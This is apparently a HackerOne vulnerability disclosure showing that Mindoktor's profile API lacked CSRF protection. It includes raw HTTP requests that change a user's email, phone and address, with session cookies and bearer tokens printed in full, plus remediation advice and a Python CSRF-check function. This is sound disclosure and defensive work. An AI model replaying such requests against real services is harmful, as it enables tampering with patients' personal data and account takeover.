Mindoktor: Lack of CSRF in App allows attackers to change patient PII data

2016-10-21T10:59:19
ID H1:177292
Type hackerone
Reporter fisher
Modified 1970-01-01T00:00:00

Description

Due to the lack of CSRF it's possible for an attacker to change PII data on a user account.

The vulnerable endpoint is: https://app.pentestapi.mindoktor.io/api/v1/user/profile

An example request:

POST /api/v1/user/profile HTTP/1.1
Host: app.pentestapi.mindoktor.io
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Referer: https://app.pentest.mindoktor.io/
Content-Length: 264
Origin: https://app.pentest.mindoktor.io
Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYW5DcmVhdGVDYXNlIjp0cnVlLCJjb21wYW55SUQiOjYsImV4cCI6MTQ3NzA1MDc3MiwiZ3JvdXBJRCI6MiwiaWF0IjoxNDc3MDQ3MDQ5LCJpZCI6NDc3LCJpbnN1cmFuY2VWYWxpZCI6dHJ1ZSwibG9naW5Nb2RlIjoiZWlkIiwibG9naW5TdGF0dXMiOiJjb21wbGV0ZSIsInBlbmRpbmciOmZhbHNlLCJ0b3NBY2NlcHRSZXF1aXJlZCI6ZmFsc2V9.94H8mgPY4D9XMu2eElf-Gk2TFKxFK94KxGYZi8UXyXM
DNT: 1
Connection: close

{"firstName":"MikM","lastName":"Fisher","email":"fisher@regala.im","phone":"070-123456","address":"Random SHackerone","postalcode":"12345","city":"Malmo","timeZone":"Europe/Stockholm","prefLang":"sv-SE","lat":55.61029815673828,"lng":13.074899673461914,"status":1}

Yields an example response:

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://app.pentest.mindoktor.io
Content-Type: application/json
Vary: Origin
Date: Fri, 21 Oct 2016 10:53:21 GMT
Content-Length: 403
Via: 1.1 google
Alt-Svc: clear
Connection: close

{"msg":"LNGProfileUpdated","data":null,"token":"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYW5DcmVhdGVDYXNlIjp0cnVlLCJjb21wYW55SUQiOjYsImV4cCI6MTQ3NzA1MDkyNCwiZ3JvdXBJRCI6MiwiaWF0IjoxNDc3MDQ3MjAxLCJpZCI6NDc3LCJpbnN1cmFuY2VWYWxpZCI6dHJ1ZSwibG9naW5Nb2RlIjoiZWlkIiwibG9naW5TdGF0dXMiOiJjb21wbGV0ZSIsInBlbmRpbmciOmZhbHNlLCJ0b3NBY2NlcHRSZXF1aXJlZCI6ZmFsc2V9.ESpTJ9uKsp2-esMg1xVok2bT9ApShy1FacApl3V-mkQ"}

Now a malicious attacker can set up an attack to change PII data on the user account, such as the email address, phone number or even the postal address, in order to retrieve more sensitive data in the future (e.g. patient conditions/diseases).

E.g.:

POST /api/v1/user/profile HTTP/1.1
Host: app.pentestapi.mindoktor.io
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Referer: https://app.pentest.mindoktor.io/
Content-Length: 264
Origin: https://app.pentest.mindoktor.io
Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYW5DcmVhdGVDYXNlIjp0cnVlLCJjb21wYW55SUQiOjYsImV4cCI6MTQ3NzA1MDc3MiwiZ3JvdXBJRCI6MiwiaWF0IjoxNDc3MDQ3MDQ5LCJpZCI6NDc3LCJpbnN1cmFuY2VWYWxpZCI6dHJ1ZSwibG9naW5Nb2RlIjoiZWlkIiwibG9naW5TdGF0dXMiOiJjb21wbGV0ZSIsInBlbmRpbmciOmZhbHNlLCJ0b3NBY2NlcHRSZXF1aXJlZCI6ZmFsc2V9.94H8mgPY4D9XMu2eElf-Gk2TFKxFK94KxGYZi8UXyXM
DNT: 1
Connection: close

{"firstName":"MikM>","lastName":"Fisher","email":"evil-email@regala.im","phone":"070-99999","address":"Evil Hackerone Location","postalcode":"12345","city":"Malmo","timeZone":"Europe/Stockholm","prefLang":"sv-SE","lat":55.61029815673828,"lng":13.074899673461914,"status":1}

(Changed email, phone number and address).

It returns the following:

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://app.pentest.mindoktor.io
Content-Type: application/json
Vary: Origin
Date: Fri, 21 Oct 2016 10:57:32 GMT
Content-Length: 403
Via: 1.1 google
Alt-Svc: clear
Connection: close

{"msg":"LNGProfileUpdated","data":null,"token":"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYW5DcmVhdGVDYXNlIjp0cnVlLCJjb21wYW55SUQiOjYsImV4cCI6MTQ3NzA1MTE3NSwiZ3JvdXBJRCI6MiwiaWF0IjoxNDc3MDQ3NDUyLCJpZCI6NDc3LCJpbnN1cmFuY2VWYWxpZCI6dHJ1ZSwibG9naW5Nb2RlIjoiZWlkIiwibG9naW5TdGF0dXMiOiJjb21wbGV0ZSIsInBlbmRpbmciOmZhbHNlLCJ0b3NBY2NlcHRSZXF1aXJlZCI6ZmFsc2V9.fbkkuKtw0lnlmz9Sjs-XMr4PHPYWj0du7oSn9cgSmrw"}

So the changes were successful.

To prevent the issue:

- Add a CSRF token
- Require the account password to make this kind of change to the account
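The following is an added server-side check illustrating the first recommendation; it is not Mindoktor's code. It rejects a profile update unless the Origin (or, failing that, the Referer) matches the application origin seen in the report's CORS response, the body is JSON, and a per-session synchronizer token is presented in a request header. The header name `X-CSRF-Token` and the `csrf_check` function are assumptions for this example.

```python
import hmac
import secrets
from typing import Dict, Tuple
from urllib.parse import urlsplit

# Trusted origin taken from the Access-Control-Allow-Origin header in the report.
TRUSTED_ORIGINS = {"https://app.pentest.mindoktor.io"}
TOKEN_HEADER = "x-csrf-token"  # assumed header name for the synchronizer token


def issue_csrf_token() -> str:
    """Generate a fresh per-session token; store it server-side and hand it to the SPA."""
    return secrets.token_urlsafe(32)


def _request_origin(headers: Dict[str, str]) -> str:
    """Prefer the Origin header; fall back to the scheme://host part of Referer."""
    if headers.get("origin"):
        return headers["origin"]
    parts = urlsplit(headers.get("referer", ""))
    return f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else ""


def csrf_check(headers: Dict[str, str], session_token: str) -> Tuple[bool, str]:
    """Return (allowed, reason) for a state-changing request.

    headers: the request headers (names compared case-insensitively).
    session_token: the token previously issued to this authenticated session.
    """
    h = {k.lower(): v for k, v in headers.items()}
    # 1. Origin/Referer must belong to the application itself.
    if _request_origin(h) not in TRUSTED_ORIGINS:
        return False, "untrusted origin"
    # 2. Only accept the JSON media type the SPA actually sends.
    media_type = h.get("content-type", "").split(";")[0].strip().lower()
    if media_type != "application/json":
        return False, "unexpected content type"
    # 3. The cookie alone is not enough: a token the browser does not attach
    #    automatically must be present and match the session's token.
    presented = h.get(TOKEN_HEADER, "")
    if not presented or not hmac.compare_digest(presented, session_token):
        return False, "missing or invalid csrf token"
    return True, "ok"
```

A request carrying only the `access_token` cookie, like the ones in the report, fails step 3 even when its Origin is legitimate.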

Best regards, Fisher